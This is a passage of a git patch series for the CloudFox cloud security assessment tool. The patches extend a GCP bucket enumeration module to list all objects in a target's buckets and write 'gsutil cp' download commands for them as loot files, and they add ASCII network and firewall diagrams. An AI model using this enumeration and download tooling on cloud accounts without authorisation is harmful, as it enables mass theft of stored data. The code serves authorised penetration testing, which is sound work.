a long time for buckets with many objects. +Use --max-objects to limit the scan, or --no-limit for unlimited.`, Run: runGCPBucketEnumCommand, } func init() { - GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (0 for unlimited)") + GCPBucketEnumCommand.Flags().IntVar(&bucketEnumMaxObjects, "max-objects", 1000, "Maximum objects to scan per bucket (default 1000)") + GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumAllObjects, "all-objects", false, "Enumerate ALL bucket contents, not just sensitive files (implies --no-limit unless --max-objects is set)") + GCPBucketEnumCommand.Flags().BoolVar(&bucketEnumNoLimit, "no-limit", false, "Remove the object limit (enumerate all objects in each bucket)") } type BucketEnumModule struct { gcpinternal.BaseGCPModule ProjectSensitiveFiles map[string][]bucketenumservice.SensitiveFileInfo // projectID -> files + ProjectAllObjects map[string][]bucketenumservice.ObjectInfo // projectID -> all objects (when --all-objects) LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + EnumerateAll bool // whether to enumerate all objects + MaxObjects int // max objects per bucket (0 = unlimited) mu sync.Mutex } @@ -69,41 +78,98 @@ func runGCPBucketEnumCommand(cmd *cobra.Command, args []string) { return } + // Determine effective max objects limit + effectiveMaxObjects := bucketEnumMaxObjects + maxObjectsExplicitlySet := cmd.Flags().Changed("max-objects") + + // --no-limit flag sets unlimited + if bucketEnumNoLimit { + effectiveMaxObjects = 0 + } + + // --all-objects implies no limit UNLESS --max-objects was explicitly set + if bucketEnumAllObjects && !maxObjectsExplicitlySet { + effectiveMaxObjects = 0 + } + module := &BucketEnumModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ProjectSensitiveFiles: make(map[string][]bucketenumservice.SensitiveFileInfo), + ProjectAllObjects: make(map[string][]bucketenumservice.ObjectInfo), LootMap: make(map[string]map[string]*internal.LootFile), + EnumerateAll: bucketEnumAllObjects, + MaxObjects: effectiveMaxObjects, } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *BucketEnumModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (max %d objects per bucket)...", bucketEnumMaxObjects), globals.GCP_BUCKETENUM_MODULE_NAME) - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + maxMsg := fmt.Sprintf("%d", m.MaxObjects) + if m.MaxObjects == 0 { + maxMsg = "unlimited" + } - allFiles := m.getAllSensitiveFiles() - if len(allFiles) == 0 { - logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) - return + if m.EnumerateAll { + logger.InfoM(fmt.Sprintf("Enumerating ALL bucket contents (%s objects per bucket)...", maxMsg), globals.GCP_BUCKETENUM_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Scanning buckets for sensitive files (%s objects per bucket)...", maxMsg), globals.GCP_BUCKETENUM_MODULE_NAME) } - // Count by risk level - criticalCount := 0 - highCount := 0 - for _, file := range allFiles { - switch file.RiskLevel { - case "CRITICAL": - criticalCount++ - case "HIGH": - highCount++ + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETENUM_MODULE_NAME, m.processProject) + + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) == 0 { + logger.InfoM("No objects found in buckets", globals.GCP_BUCKETENUM_MODULE_NAME) + return } + + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d object(s) across all buckets (%d public)", + len(allObjects), publicCount), globals.GCP_BUCKETENUM_MODULE_NAME) + } else { + // Sensitive files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) == 0 { + logger.InfoM("No sensitive files found", globals.GCP_BUCKETENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, file := range allFiles { + switch file.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", + len(allFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) } - logger.SuccessM(fmt.Sprintf("Found %d potentially sensitive file(s) (%d CRITICAL, %d HIGH)", - len(allFiles), criticalCount, highCount), globals.GCP_BUCKETENUM_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *BucketEnumModule) getAllObjects() []bucketenumservice.ObjectInfo { + var all []bucketenumservice.ObjectInfo + for _, objects := range m.ProjectAllObjects { + all = append(all, objects...) + } + return all +} + func (m *BucketEnumModule) getAllSensitiveFiles() []bucketenumservice.SensitiveFileInfo { var all []bucketenumservice.SensitiveFileInfo for _, files := range m.ProjectSensitiveFiles { @@ -123,13 +189,20 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, // Initialize loot for this project if m.LootMap[projectID] == nil { m.LootMap[projectID] = make(map[string]*internal.LootFile) - m.LootMap[projectID]["bucket-enum-sensitive-commands"] = &internal.LootFile{ - Name: "bucket-enum-sensitive-commands", - Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap[projectID]["bucket-enum-commands"] = &internal.LootFile{ - Name: "bucket-enum-commands", - Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + if m.EnumerateAll { + m.LootMap[projectID]["bucket-enum-all-commands"] = &internal.LootFile{ + Name: "bucket-enum-all-commands", + Contents: "# GCS Download Commands for All Objects\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } else { + m.LootMap[projectID]["bucket-enum-sensitive-commands"] = &internal.LootFile{ + Name: "bucket-enum-sensitive-commands", + Contents: "# GCS Download Commands for CRITICAL/HIGH Risk Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["bucket-enum-commands"] = &internal.LootFile{ + Name: "bucket-enum-commands", + Contents: "# GCS Download Commands for All Detected Files\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } } } m.mu.Unlock() @@ -147,25 +220,64 @@ func (m *BucketEnumModule) processProject(ctx context.Context, projectID string, logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETENUM_MODULE_NAME) } - // Scan each bucket - var projectFiles []bucketenumservice.SensitiveFileInfo - for _, bucketName := range buckets { - files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, bucketEnumMaxObjects) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, - fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) - continue + if m.EnumerateAll { + // Enumerate ALL objects in each bucket + var projectObjects []bucketenumservice.ObjectInfo + for _, bucketName := range buckets { + objects, err := svc.EnumerateAllBucketObjects(bucketName, projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not enumerate bucket %s in project %s", bucketName, projectID)) + continue + } + projectObjects = append(projectObjects, objects...) + } + + m.mu.Lock() + m.ProjectAllObjects[projectID] = projectObjects + for _, obj := range projectObjects { + m.addObjectToLoot(projectID, obj) + } + m.mu.Unlock() + } else { + // Scan for sensitive files only + var projectFiles []bucketenumservice.SensitiveFileInfo + for _, bucketName := range buckets { + files, err := svc.EnumerateBucketSensitiveFiles(bucketName, projectID, m.MaxObjects) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BUCKETENUM_MODULE_NAME, + fmt.Sprintf("Could not scan bucket %s in project %s", bucketName, projectID)) + continue + } + projectFiles = append(projectFiles, files...) + } + + m.mu.Lock() + m.ProjectSensitiveFiles[projectID] = projectFiles + for _, file := range projectFiles { + m.addFileToLoot(projectID, file) } - projectFiles = append(projectFiles, files...) + m.mu.Unlock() } +} - m.mu.Lock() - m.ProjectSensitiveFiles[projectID] = projectFiles - for _, file := range projectFiles { - m.addFileToLoot(projectID, file) +func (m *BucketEnumModule) addObjectToLoot(projectID string, obj bucketenumservice.ObjectInfo) { + if lootFile := m.LootMap[projectID]["bucket-enum-all-commands"]; lootFile != nil { + publicMarker := "" + if obj.IsPublic { + publicMarker = " [PUBLIC]" + } + lootFile.Contents += fmt.Sprintf( + "# gs://%s/%s%s\n"+ + "# Size: %d bytes, Type: %s\n"+ + "%s\n\n", + obj.BucketName, obj.ObjectName, publicMarker, + obj.Size, obj.ContentType, + obj.DownloadCmd, + ) } - m.mu.Unlock() } func (m *BucketEnumModule) addFileToLoot(projectID string, file bucketenumservice.SensitiveFileInfo) { @@ -214,6 +326,10 @@ func (m *BucketEnumModule) getSensitiveFilesHeader() []string { return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Category", "Size", "Public"} } +func (m *BucketEnumModule) getAllObjectsHeader() []string { + return []string{"Project ID", "Project Name", "Bucket", "Object Name", "Content Type", "Size", "Public", "Updated"} +} + func (m *BucketEnumModule) filesToTableBody(files []bucketenumservice.SensitiveFileInfo) [][]string { var body [][]string for _, file := range files { @@ -257,24 +373,58 @@ func (m *BucketEnumModule) sensitiveFilesToTableBody(files []bucketenumservice.S return body } +func (m *BucketEnumModule) allObjectsToTableBody(objects []bucketenumservice.ObjectInfo) [][]string { + var body [][]string + for _, obj := range objects { + publicStatus := "No" + if obj.IsPublic { + publicStatus = "Yes" + } + body = append(body, []string{ + obj.ProjectID, + m.GetProjectName(obj.ProjectID), + obj.BucketName, + obj.ObjectName, + obj.ContentType, + formatFileSize(obj.Size), + publicStatus, + obj.Updated, + }) + } + return body +} + func (m *BucketEnumModule) buildTablesForProject(projectID string) []internal.TableFile { var tableFiles []internal.TableFile - files := m.ProjectSensitiveFiles[projectID] - if len(files) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "bucket-enum", - Header: m.getFilesHeader(), - Body: m.filesToTableBody(files), - }) - - sensitiveBody := m.sensitiveFilesToTableBody(files) - if len(sensitiveBody) > 0 { + if m.EnumerateAll { + // Full enumeration mode + objects := m.ProjectAllObjects[projectID] + if len(objects) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bucket-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(objects), + }) + } + } else { + // Sensitive files mode + files := m.ProjectSensitiveFiles[projectID] + if len(files) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "bucket-enum-sensitive", - Header: m.getSensitiveFilesHeader(), - Body: sensitiveBody, + Name: "bucket-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(files), }) + + sensitiveBody := m.sensitiveFilesToTableBody(files) + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + } } } @@ -287,7 +437,19 @@ func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger i ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - for projectID := range m.ProjectSensitiveFiles { + // Get the appropriate project map based on mode + var projectIDs []string + if m.EnumerateAll { + for projectID := range m.ProjectAllObjects { + projectIDs = append(projectIDs, projectID) + } + } else { + for projectID := range m.ProjectSensitiveFiles { + projectIDs = append(projectIDs, projectID) + } + } + + for _, projectID := range projectIDs { tableFiles := m.buildTablesForProject(projectID) var lootFiles []internal.LootFile @@ -311,25 +473,48 @@ func (m *BucketEnumModule) writeHierarchicalOutput(ctx context.Context, logger i } func (m *BucketEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { - allFiles := m.getAllSensitiveFiles() - var tables []internal.TableFile - if len(allFiles) > 0 { - tables = append(tables, internal.TableFile{ - Name: "bucket-enum", - Header: m.getFilesHeader(), - Body: m.filesToTableBody(allFiles), - }) + if m.EnumerateAll { + // Full enumeration mode + allObjects := m.getAllObjects() + if len(allObjects) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-all", + Header: m.getAllObjectsHeader(), + Body: m.allObjectsToTableBody(allObjects), + }) - sensitiveBody := m.sensitiveFilesToTableBody(allFiles) - if len(sensitiveBody) > 0 { + // Count public objects + publicCount := 0 + for _, obj := range allObjects { + if obj.IsPublic { + publicCount++ + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible object(s)!", publicCount), globals.GCP_BUCKETENUM_MODULE_NAME) + } + } + } else { + // Sensitive files mode + allFiles := m.getAllSensitiveFiles() + if len(allFiles) > 0 { tables = append(tables, internal.TableFile{ - Name: "bucket-enum-sensitive", - Header: m.getSensitiveFilesHeader(), - Body: sensitiveBody, + Name: "bucket-enum", + Header: m.getFilesHeader(), + Body: m.filesToTableBody(allFiles), }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + + sensitiveBody := m.sensitiveFilesToTableBody(allFiles) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bucket-enum-sensitive", + Header: m.getSensitiveFilesHeader(), + Body: sensitiveBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH risk files!", len(sensitiveBody)), globals.GCP_BUCKETENUM_MODULE_NAME) + } } } diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index c9f5e02b..782c8924 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -269,6 +269,71 @@ func (s *BucketEnumService) isFalsePositive(objectName string, pattern Sensitive return false } +// ObjectInfo represents any file in a bucket (for full enumeration) +type ObjectInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` + DownloadCmd string `json:"downloadCmd"` +} + +// EnumerateAllBucketObjects lists ALL objects in a bucket (no filtering) +func (s *BucketEnumService) EnumerateAllBucketObjects(bucketName, projectID string, maxObjects int) ([]ObjectInfo, error) { + ctx := context.Background() + var storageService *storage.Service + var err error + + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var objects []ObjectInfo + objectCount := 0 + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + + err = req.Pages(ctx, func(objList *storage.Objects) error { + for _, obj := range objList.Items { + if maxObjects > 0 && objectCount >= maxObjects { + return iterator.Done + } + + isPublic := s.isObjectPublic(obj) + + objects = append(objects, ObjectInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + }) + objectCount++ + } + return nil + }) + + if err != nil && err != iterator.Done { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return objects, nil +} + // GetBucketsList lists all buckets in a project func (s *BucketEnumService) GetBucketsList(projectID string) ([]string, error) { ctx := context.Background() From c94996e4704922b46b26ed5b2f3896fa22c8a62f Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 15 Jan 2026 21:39:46 -0500 Subject: [PATCH 21/48] added network diagrams --- gcp/commands/firewall.go | 99 ++ gcp/commands/loadbalancers.go | 65 + gcp/commands/networktopology.go | 634 ++++++++ gcp/commands/vpcnetworks.go | 91 ++ gcp/services/diagramService/diagramService.go | 1309 +++++++++++++++++ 5 files changed, 2198 insertions(+) create mode 100644 gcp/services/diagramService/diagramService.go diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 83304aff..9acc1e4e 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -268,6 +269,35 @@ func (m *FirewallModule) addFirewallRuleToLoot(projectID string, rule NetworkSer // Output Generation // ------------------------------ func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateFirewallDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + } + } + } + // Decide between hierarchical and flat output if m.Hierarchy != nil && !m.FlatOutput { m.writeHierarchicalOutput(ctx, logger) @@ -518,6 +548,75 @@ func (m *FirewallModule) writeFlatOutput(ctx context.Context, logger internal.Lo } } +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateFirewallDiagram creates an ASCII visualization of firewall rules +func (m *FirewallModule) generateFirewallDiagram() string { + allRules := m.getAllFirewallRules() + if len(allRules) == 0 { + return "" + } + + // Group rules by network + rulesByNetwork := make(map[string][]NetworkService.FirewallRuleInfo) + for _, rule := range allRules { + key := rule.ProjectID + "/" + rule.Network + rulesByNetwork[key] = append(rulesByNetwork[key], rule) + } + + var sb strings.Builder + width := 90 + + // Header + sb.WriteString(diagramservice.DrawBox("GCP FIREWALL RULES DIAGRAM - Generated by CloudFox", width)) + sb.WriteString("\n") + + // Draw diagram for each network + for key, rules := range rulesByNetwork { + parts := strings.SplitN(key, "/", 2) + projectID := "" + networkName := key + if len(parts) == 2 { + projectID = parts[0] + networkName = parts[1] + } + + // Convert to diagram service types + diagramRules := make([]diagramservice.FirewallRuleInfo, 0, len(rules)) + for _, r := range rules { + allowedPorts := formatProtocols(r.AllowedProtocols) + if allowedPorts == "" { + allowedPorts = "*" + } + + targets := "ALL" + if len(r.TargetTags) > 0 { + targets = strings.Join(r.TargetTags, ", ") + } else if len(r.TargetSAs) > 0 { + targets = strings.Join(r.TargetSAs, ", ") + } + + diagramRules = append(diagramRules, diagramservice.FirewallRuleInfo{ + Name: r.Name, + Direction: r.Direction, + Priority: r.Priority, + SourceRanges: r.SourceRanges, + AllowedPorts: allowedPorts, + TargetTags: targets, + IsPublicIngress: r.IsPublicIngress, + Disabled: r.Disabled, + }) + } + + sb.WriteString(diagramservice.DrawFirewallDiagram(diagramRules, networkName, projectID, width)) + sb.WriteString("\n") + } + + return sb.String() +} + // Helper functions // formatProtocols formats allowed/denied protocols for display diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go index f1ca9381..54ece4dc 100644 --- a/gcp/commands/loadbalancers.go +++ b/gcp/commands/loadbalancers.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" @@ -192,6 +193,35 @@ func (m *LoadBalancersModule) addToLoot(projectID string, lb loadbalancerservice } func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateLoadBalancerDiagram() + if diagram != "" { + // Add diagram to the first project's loot + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["loadbalancers-diagram"] = &internal.LootFile{ + Name: "loadbalancers-diagram", + Contents: diagram, + } + } + } + } + if m.Hierarchy != nil && !m.FlatOutput { m.writeHierarchicalOutput(ctx, logger) } else { @@ -199,6 +229,41 @@ func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.L } } +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateLoadBalancerDiagram creates an ASCII visualization of load balancer architecture +func (m *LoadBalancersModule) generateLoadBalancerDiagram() string { + allLBs := m.getAllLoadBalancers() + if len(allLBs) == 0 { + return "" + } + + // Convert to diagram service types + diagramLBs := make([]diagramservice.LoadBalancerInfo, 0, len(allLBs)) + for _, lb := range allLBs { + diagramLBs = append(diagramLBs, diagramservice.LoadBalancerInfo{ + Name: lb.Name, + Type: lb.Type, + Scheme: lb.Scheme, + IPAddress: lb.IPAddress, + Port: lb.Port, + Region: lb.Region, + BackendServices: lb.BackendServices, + SecurityPolicy: lb.SecurityPolicy, + }) + } + + // Determine project ID for header (use first project if multiple) + projectID := "" + if len(m.ProjectIDs) == 1 { + projectID = m.ProjectIDs[0] + } + + return diagramservice.DrawLoadBalancerDiagram(diagramLBs, projectID, 90) +} + func (m *LoadBalancersModule) getLBHeader() []string { return []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} } diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 7d90de5a..7e873824 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -612,6 +612,611 @@ func (m *NetworkTopologyModule) extractRegionFromURL(url string) string { return url } +// ------------------------------ +// ASCII Network Diagram Generator +// ------------------------------ + +// generateASCIIDiagram creates an ASCII visualization of the network topology +func (m *NetworkTopologyModule) generateASCIIDiagram() string { + var sb strings.Builder + + // Header + sb.WriteString(m.drawBox("GCP NETWORK TOPOLOGY MAP - Generated by CloudFox", 90)) + sb.WriteString("\n") + + // Get all data + allNetworks := m.getAllNetworks() + allPeerings := m.getAllPeerings() + + // Group networks by project + networksByProject := make(map[string][]VPCNetwork) + for _, n := range allNetworks { + networksByProject[n.ProjectID] = append(networksByProject[n.ProjectID], n) + } + + // Group subnets by project and network + subnetsByNetwork := make(map[string][]Subnet) // key: "projectID/networkName" + for _, subnets := range m.ProjectSubnets { + for _, s := range subnets { + networkName := m.extractNetworkName(s.Network) + key := s.ProjectID + "/" + networkName + subnetsByNetwork[key] = append(subnetsByNetwork[key], s) + } + } + + // Group NATs by project and network + natsByNetwork := make(map[string][]CloudNATConfig) // key: "projectID/networkName" + for _, nats := range m.ProjectNATs { + for _, nat := range nats { + networkName := m.extractNetworkName(nat.Network) + key := nat.ProjectID + "/" + networkName + natsByNetwork[key] = append(natsByNetwork[key], nat) + } + } + + // Build peering map for quick lookup + peeringMap := make(map[string][]VPCPeering) // key: "projectID/networkName" + for _, p := range allPeerings { + networkName := m.extractNetworkName(p.Network) + key := p.ProjectID + "/" + networkName + peeringMap[key] = append(peeringMap[key], p) + } + + // Sort projects for consistent output + var projectIDs []string + for projectID := range networksByProject { + projectIDs = append(projectIDs, projectID) + } + sort.Strings(projectIDs) + + // Draw each project + for _, projectID := range projectIDs { + networks := networksByProject[projectID] + sb.WriteString(m.drawProjectSection(projectID, networks, subnetsByNetwork, natsByNetwork, peeringMap)) + sb.WriteString("\n") + } + + // Draw Shared VPC relationships if any + if len(m.SharedVPCs) > 0 { + sb.WriteString(m.drawSharedVPCSection()) + sb.WriteString("\n") + } + + // Draw VPC Peering summary + if len(allPeerings) > 0 { + sb.WriteString(m.drawPeeringSummary(allPeerings)) + sb.WriteString("\n") + } + + // Legend + sb.WriteString(m.drawLegend()) + + return sb.String() +} + +// drawBox draws a simple box with centered title +func (m *NetworkTopologyModule) drawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawProjectSection draws the network topology for a single project +func (m *NetworkTopologyModule) drawProjectSection(projectID string, networks []VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering) string { + + var sb strings.Builder + width := 90 + + projectName := m.GetProjectName(projectID) + projectTitle := fmt.Sprintf("PROJECT: %s", projectID) + if projectName != "" && projectName != projectID { + projectTitle = fmt.Sprintf("PROJECT: %s (%s)", projectID, projectName) + } + + // Project header + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, projectTitle)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Sort networks + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + + // Draw each VPC network + for _, network := range networks { + sb.WriteString(m.drawVPCNetwork(network, subnetsByNetwork, natsByNetwork, peeringMap, width)) + } + + // Project footer + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// drawVPCNetwork draws a single VPC network with its subnets +func (m *NetworkTopologyModule) drawVPCNetwork(network VPCNetwork, + subnetsByNetwork map[string][]Subnet, natsByNetwork map[string][]CloudNATConfig, + peeringMap map[string][]VPCPeering, outerWidth int) string { + + var sb strings.Builder + innerWidth := outerWidth - 6 + + // VPC header with attributes + vpcTitle := fmt.Sprintf("VPC: %s", network.Name) + vpcAttrs := fmt.Sprintf("(%s routing, MTU: %d)", network.RoutingMode, network.MTU) + + // Add Shared VPC indicator + sharedVPCLabel := "" + if network.IsSharedVPC { + sharedVPCLabel = fmt.Sprintf(" [SHARED VPC %s]", strings.ToUpper(network.SharedVPCRole)) + } + + // Peering indicator + peeringLabel := "" + if network.PeeringCount > 0 { + peeringLabel = fmt.Sprintf(" [%d PEERING(s)]", network.PeeringCount) + } + + sb.WriteString("│ │\n") + sb.WriteString("│ ┌") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┐ │\n") + + // VPC title line + titleLine := fmt.Sprintf("%s %s%s%s", vpcTitle, vpcAttrs, sharedVPCLabel, peeringLabel) + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, titleLine)) + + sb.WriteString("│ ├") + sb.WriteString(strings.Repeat("─", innerWidth-2)) + sb.WriteString("┤ │\n") + + // Get subnets for this network + key := network.ProjectID + "/" + network.Name + subnets := subnetsByNetwork[key] + + // Group subnets by region + subnetsByRegion := make(map[string][]Subnet) + for _, s := range subnets { + subnetsByRegion[s.Region] = append(subnetsByRegion[s.Region], s) + } + + // Sort regions + var regions []string + for region := range subnetsByRegion { + regions = append(regions, region) + } + sort.Strings(regions) + + if len(subnets) == 0 { + sb.WriteString(fmt.Sprintf("│ │ %-*s │ │\n", innerWidth-4, "(No subnets)")) + } else { + // Draw subnets in a grid layout (3 per row) + subnetWidth := 26 + subnetsPerRow := 3 + + for i := 0; i < len(regions); i += subnetsPerRow { + // Draw subnet boxes for this row + endIdx := i + subnetsPerRow + if endIdx > len(regions) { + endIdx = len(regions) + } + rowRegions := regions[i:endIdx] + + // Top of subnet boxes + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┐") + } + // Pad remaining space + remaining := innerWidth - 4 - (len(rowRegions) * subnetWidth) - ((len(rowRegions) - 1) * 2) + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Region name line + sb.WriteString("│ │ ") + for j, region := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + regionDisplay := region + if len(regionDisplay) > subnetWidth-4 { + regionDisplay = regionDisplay[:subnetWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│ %-*s │", subnetWidth-4, regionDisplay)) + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Separator + sb.WriteString("│ │ ") + for j := range rowRegions { + if j > 0 { + sb.WriteString(" ") + } + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", subnetWidth-2)) + sb.WriteString("┤") + } + sb.WriteString(strings.Repeat(" ", remaining)) + sb.WriteString(" │ │\n") + + // Subnet details for each region + maxSubnets := 0 + for _, region := range rowRegions { + if len(subnetsByRegion[region]) > maxSubnets { + maxSubnets = len(subnetsByRegion[region]) + } + } + + for subnetIdx := 0; subnetIdx < maxSubnets; 